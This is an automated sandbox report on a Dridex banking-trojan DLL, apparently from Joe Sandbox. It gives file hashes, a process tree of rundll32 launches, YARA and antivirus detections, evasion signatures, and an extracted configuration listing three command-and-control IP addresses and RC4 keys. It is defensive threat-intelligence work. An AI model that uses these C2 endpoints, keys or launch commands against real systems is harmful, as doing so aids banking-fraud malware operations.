Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll
Analysis ID:	510686
MD5:	e53a16bea7918b1f7d4c0e659febc766
SHA1:	10d4d3d7fac35f6492cda2fb04aebf46903481f0
SHA256:	212cae7b05ecbc938b3a1fda4753d119f69360165955937b836fdbc7a6d514eb
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Found detection on Joe Sandbox Cloud Basic with higher score

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Antivirus or Machine Learning detection for unpacked file

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Launches processes in debugging mode, may be used to hinder debugging

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 1624 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 2940 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 3596 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3712 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5596 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',CheckTrust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5964 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllCanUnloadNow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 2512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 2212 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 1036 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 6120 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DownloadFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 1112 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',GetICifFileFromFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["149.202.179.100:443", "66.147.235.11:6891", "81.0.236.89:13786"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "ranVAwtYINZG8jFJSjh5rR8jx3HIZIvSCern79nVFUhfeb2NvJlOKPsGO1osGE0VchV9bFDjym"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.650424736.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000013.00000000.633029380.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000012.00000000.639692678.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.372154068.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000010.00000000.609752932.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000012.00000002.647602284.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000013.00000000.640582271.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000013.00000002.648668483.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000002.649606375.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000011.00000002.646115407.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000011.00000000.614518127.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000010.00000000.600008382.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000012.00000000.631903118.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000011.00000000.600571038.000000006ECF1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
17.0.rundll32.exe.6ecf0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
19.0.rundll32.exe.6ecf0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.2.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
18.2.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
19.2.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
14.2.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
17.0.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
18.0.rundll32.exe.6ecf0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
16.0.rundll32.exe.6ecf0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
18.0.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
17.2.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
16.0.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
19.0.rundll32.exe.6ecf0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 10 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.6ecf0000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["149.202.179.100:443", "66.147.235.11:6891", "81.0.236.89:13786"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "ranVAwtYINZG8jFJSjh5rR8jx3HIZIvSCern79nVFUhfeb2NvJlOKPsGO1osGE0VchV9bFDjym"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Virustotal: Detection: 21%			Perma Link
Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	ReversingLabs: Detection: 31%

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Joe Sandbox ML: detected

Source: 19.0.rundll32.exe.754756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 18.0.rundll32.exe.4764756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.rundll32.exe.5b0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 19.0.rundll32.exe.5b0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 17.0.rundll32.exe.4af4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.rundll32.exe.f70000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.0.rundll32.exe.4df4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.loaddll32.exe.1250000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.0.rundll32.exe.3300000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 14.2.rundll32.exe.3464756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 19.0.rundll32.exe.754756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 19.0.rundll32.exe.5b0000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 18.0.rundll32.exe.4764756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 18.2.rundll32.exe.c00000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 17.0.rundll32.exe.f70000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.0.rundll32.exe.3300000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 19.2.rundll32.exe.754756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.rundll32.exe.e94756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 18.2.rundll32.exe.4764756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 16.0.rundll32.exe.b20000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 17.0.rundll32.exe.f70000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 16.0.rundll32.exe.b20000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 4.2.rundll32.exe.bd0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 0.2.loaddll32.exe.15e4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 16.0.rundll32.exe.1144756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.rundll32.exe.4af4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.rundll32.exe.4df4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 18.0.rundll32.exe.c00000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 17.0.rundll32.exe.4af4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 18.0.rundll32.exe.c00000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 14.2.rundll32.exe.fc0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 16.0.rundll32.exe.1144756.4.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: rpidebbfll.pdb source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000004.00000003.352818755.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 0000000E.00000003.595500849.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.352818755.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 0000000E.00000003.595500849.000000004B280000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 149.202.179.100:443
Source: Malware configuration extractor	IPs: 66.147.235.11:6891
Source: Malware configuration extractor	IPs: 81.0.236.89:13786

Source: Joe Sandbox View	ASN Name: HOSTROCKETUS HOSTROCKETUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	IP Address: 66.147.235.11 66.147.235.11
Source: Joe Sandbox View	IP Address: 149.202.179.100 149.202.179.100
Source: Joe Sandbox View	IP Address: 81.0.236.89 81.0.236.89

Source: loaddll32.exe, 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.372865791.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.649740233.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.650585460.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000000.600585830.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000000.614963241.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000000.640010436.000000006ED0F000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000000.640637691.000000006ED0F000.00000002.00020000.sdmp

String found in binary or memory: http://www.vomfass.deDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 17.0.rundll32.exe.6ecf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.rundll32.exe.6ecf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.rundll32.exe.6ecf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.rundll32.exe.6ecf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.rundll32.exe.6ecf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.650424736.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.633029380.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.639692678.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.372154068.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.609752932.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.647602284.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.640582271.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.648668483.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.649606375.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646115407.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.614518127.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.600008382.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.631903118.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.600571038.000000006ECF1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Found detection on Joe Sandbox Cloud Basic with higher score

Show sources

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Joe Sandbox Cloud Basic: Detection: malicious Score: 76 Threat Name: Dridex

Perma Link

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Binary or memory string: OriginalFilenameddlb.dll vs SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED00754	0_2_6ED00754
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED09348	0_2_6ED09348
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECF1494	0_2_6ECF1494
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECF846C	0_2_6ECF846C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED01460	0_2_6ED01460
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED01D58	0_2_6ED01D58
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECFA52C	0_2_6ECFA52C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECF90CC	0_2_6ECF90CC

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Virustotal: Detection: 21%
Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	ReversingLabs: Detection: 31%

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',CheckTrust
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllCanUnloadNow
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllGetClassObject
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DownloadFile
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',GetICifFileFromFile
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 664
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',CheckTrust	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllCanUnloadNow	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DownloadFile	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',GetICifFileFromFile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 664	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6120
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5964
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2212

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERA390.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winDLL@28/11@0/3

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static file information: File size 1093632 > 1048576

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: rpidebbfll.pdb source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000004.00000003.352818755.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 0000000E.00000003.595500849.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.352818755.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 0000000E.00000003.595500849.000000004B280000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECFF6CC push esi; mov dword ptr [esp], 00000000h

0_2_6ECFF6CD

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
